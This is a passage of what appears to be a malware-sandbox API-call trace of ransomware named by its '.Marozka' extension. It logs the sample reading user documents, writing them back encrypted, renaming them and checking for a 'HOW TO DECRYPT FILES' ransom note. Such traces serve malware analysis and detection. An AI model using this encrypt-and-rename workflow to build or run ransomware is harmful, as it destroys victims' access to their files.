lpBuffer=0x273c0c4, nNumberOfBytesToRead=0xf831, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x273c0c4*, lpNumberOfBytesRead=0x5beabc*=0xf831, lpOverlapped=0x0) returned 1 [0050.197] CloseHandle (hObject=0x2e0) returned 1 [0050.214] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.214] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.214] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx", lpFilePart=0x0) returned 0x33 [0050.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.215] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mn1d4ziy0_mayquuua_a.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.216] GetFileType (hFile=0x2e0) returned 0x1 [0050.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.216] GetFileType (hFile=0x2e0) returned 0x1 [0050.216] WriteFile (in: hFile=0x2e0, lpBuffer=0x27b7784*, nNumberOfBytesToWrite=0xf840, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27b7784*, lpNumberOfBytesWritten=0x5beab0*=0xf840, lpOverlapped=0x0) returned 1 [0050.289] CloseHandle (hObject=0x2e0) returned 1 [0050.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx", lpFilePart=0x0) returned 0x33 [0050.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx.Marozka", lpFilePart=0x0) returned 0x3b [0050.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mn1d4ziy0_mayquuua_a.docx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea4804b0, ftCreationTime.dwHighDateTime=0x1d4cdb5, ftLastAccessTime.dwLowDateTime=0x8ac1fae0, ftLastAccessTime.dwHighDateTime=0x1d4679a, ftLastWriteTime.dwLowDateTime=0xe0b41f31, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xf840)) returned 1 [0050.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.294] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mn1d4ziy0_mayquuua_a.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\mn1d4Ziy0_MAyQUUuA_A.docx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\mn1d4ziy0_mayquuua_a.docx.marozka")) returned 1 [0050.295] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx", lpFilePart=0x0) returned 0x25 [0050.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.295] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mq0seo.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.295] GetFileType (hFile=0x2e0) returned 0x1 [0050.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.295] GetFileType (hFile=0x2e0) returned 0x1 [0050.295] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x5ce5 [0050.296] ReadFile (in: hFile=0x2e0, lpBuffer=0x27c74c4, nNumberOfBytesToRead=0x5ce5, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27c74c4*, lpNumberOfBytesRead=0x5beabc*=0x5ce5, lpOverlapped=0x0) returned 1 [0050.296] CloseHandle (hObject=0x2e0) returned 1 [0050.371] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.372] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.372] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx", lpFilePart=0x0) returned 0x25 [0050.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.372] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mq0seo.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.374] GetFileType (hFile=0x2e0) returned 0x1 [0050.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.374] GetFileType (hFile=0x2e0) returned 0x1 [0050.374] WriteFile (in: hFile=0x2e0, lpBuffer=0x2831360*, nNumberOfBytesToWrite=0x5cf0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2831360*, lpNumberOfBytesWritten=0x5beab0*=0x5cf0, lpOverlapped=0x0) returned 1 [0050.375] CloseHandle (hObject=0x2e0) returned 1 [0050.377] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx", lpFilePart=0x0) returned 0x25 [0050.377] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx.Marozka", lpFilePart=0x0) returned 0x2d [0050.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mq0seo.pptx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9962930, ftCreationTime.dwHighDateTime=0x1d479bc, ftLastAccessTime.dwLowDateTime=0x3e2fbb0, ftLastAccessTime.dwHighDateTime=0x1d47342, ftLastWriteTime.dwLowDateTime=0xe0c26ce6, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5cf0)) returned 1 [0050.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.378] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mq0seo.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\MQ0SeO.pptx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\mq0seo.pptx.marozka")) returned 1 [0050.378] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx", lpFilePart=0x0) returned 0x30 [0050.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.378] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\po9dnjfkq rxecarh.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.379] GetFileType (hFile=0x2e0) returned 0x1 [0050.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.379] GetFileType (hFile=0x2e0) returned 0x1 [0050.379] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x457a [0050.379] ReadFile (in: hFile=0x2e0, lpBuffer=0x28374f4, nNumberOfBytesToRead=0x457a, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x28374f4*, lpNumberOfBytesRead=0x5beabc*=0x457a, lpOverlapped=0x0) returned 1 [0050.380] CloseHandle (hObject=0x2e0) returned 1 [0050.450] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.450] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.451] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx", lpFilePart=0x0) returned 0x30 [0050.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\po9dnjfkq rxecarh.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.453] GetFileType (hFile=0x2e0) returned 0x1 [0050.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.453] GetFileType (hFile=0x2e0) returned 0x1 [0050.453] WriteFile (in: hFile=0x2e0, lpBuffer=0x2899e60*, nNumberOfBytesToWrite=0x4580, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2899e60*, lpNumberOfBytesWritten=0x5beab0*=0x4580, lpOverlapped=0x0) returned 1 [0050.454] CloseHandle (hObject=0x2e0) returned 1 [0050.455] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx", lpFilePart=0x0) returned 0x30 [0050.456] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx.Marozka", lpFilePart=0x0) returned 0x38 [0050.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\po9dnjfkq rxecarh.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35aad890, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0x5058d860, ftLastAccessTime.dwHighDateTime=0x1d47e6a, ftLastWriteTime.dwLowDateTime=0xe0ce5933, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x4580)) returned 1 [0050.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.456] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\po9dnjfkq rxecarh.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\PO9dNjfkQ RXEcARh.xlsx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\po9dnjfkq rxecarh.xlsx.marozka")) returned 1 [0050.457] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx", lpFilePart=0x0) returned 0x25 [0050.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.457] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qau97d.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.457] GetFileType (hFile=0x2e0) returned 0x1 [0050.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.457] GetFileType (hFile=0x2e0) returned 0x1 [0050.457] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xce1 [0050.457] ReadFile (in: hFile=0x2e0, lpBuffer=0x289f5bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x289f5bc*, lpNumberOfBytesRead=0x5beabc*=0xce1, lpOverlapped=0x0) returned 1 [0050.458] CloseHandle (hObject=0x2e0) returned 1 [0050.643] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.643] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.643] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx", lpFilePart=0x0) returned 0x25 [0050.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qau97d.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.645] GetFileType (hFile=0x2e0) returned 0x1 [0050.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.645] GetFileType (hFile=0x2e0) returned 0x1 [0050.645] WriteFile (in: hFile=0x2e0, lpBuffer=0x26558a0*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x5bea84, lpOverlapped=0x0 | out: lpBuffer=0x26558a0*, lpNumberOfBytesWritten=0x5bea84*=0xcf0, lpOverlapped=0x0) returned 1 [0050.646] CloseHandle (hObject=0x2e0) returned 1 [0050.650] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx", lpFilePart=0x0) returned 0x25 [0050.650] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx.Marozka", lpFilePart=0x0) returned 0x2d [0050.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.650] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qau97d.pptx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef0e9f90, ftCreationTime.dwHighDateTime=0x1d45d8a, ftLastAccessTime.dwLowDateTime=0x643855d0, ftLastAccessTime.dwHighDateTime=0x1d4e405, ftLastWriteTime.dwLowDateTime=0xe0eaf56f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xcf0)) returned 1 [0050.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.650] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qau97d.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\qaU97d.pptx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\qau97d.pptx.marozka")) returned 1 [0050.651] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx", lpFilePart=0x0) returned 0x2e [0050.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.651] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scsmi6dtuwdw0cq.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.652] GetFileType (hFile=0x2e0) returned 0x1 [0050.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.652] GetFileType (hFile=0x2e0) returned 0x1 [0050.652] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x17f98 [0050.652] ReadFile (in: hFile=0x2e0, lpBuffer=0x3641a68, nNumberOfBytesToRead=0x17f98, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x3641a68*, lpNumberOfBytesRead=0x5beabc*=0x17f98, lpOverlapped=0x0) returned 1 [0050.653] CloseHandle (hObject=0x2e0) returned 1 [0050.719] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.719] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx", lpFilePart=0x0) returned 0x2e [0050.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scsmi6dtuwdw0cq.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.721] GetFileType (hFile=0x2e0) returned 0x1 [0050.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.721] GetFileType (hFile=0x2e0) returned 0x1 [0050.721] WriteFile (in: hFile=0x2e0, lpBuffer=0x36b98c0*, nNumberOfBytesToWrite=0x17fa0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x36b98c0*, lpNumberOfBytesWritten=0x5beab0*=0x17fa0, lpOverlapped=0x0) returned 1 [0050.723] CloseHandle (hObject=0x2e0) returned 1 [0050.730] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx", lpFilePart=0x0) returned 0x2e [0050.730] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx.Marozka", lpFilePart=0x0) returned 0x36 [0050.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0050.730] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scsmi6dtuwdw0cq.docx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2a0870, ftCreationTime.dwHighDateTime=0x1d4e182, ftLastAccessTime.dwLowDateTime=0xec03eb00, ftLastAccessTime.dwHighDateTime=0x1d4b647, ftLastWriteTime.dwLowDateTime=0xe0f6e107, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x17fa0)) returned 1 [0050.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0050.730] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scsmi6dtuwdw0cq.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\SCSMI6dtuWDW0cq.docx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\scsmi6dtuwdw0cq.docx.marozka")) returned 1 [0050.731] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx", lpFilePart=0x0) returned 0x28 [0050.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0050.731] CreateFileW 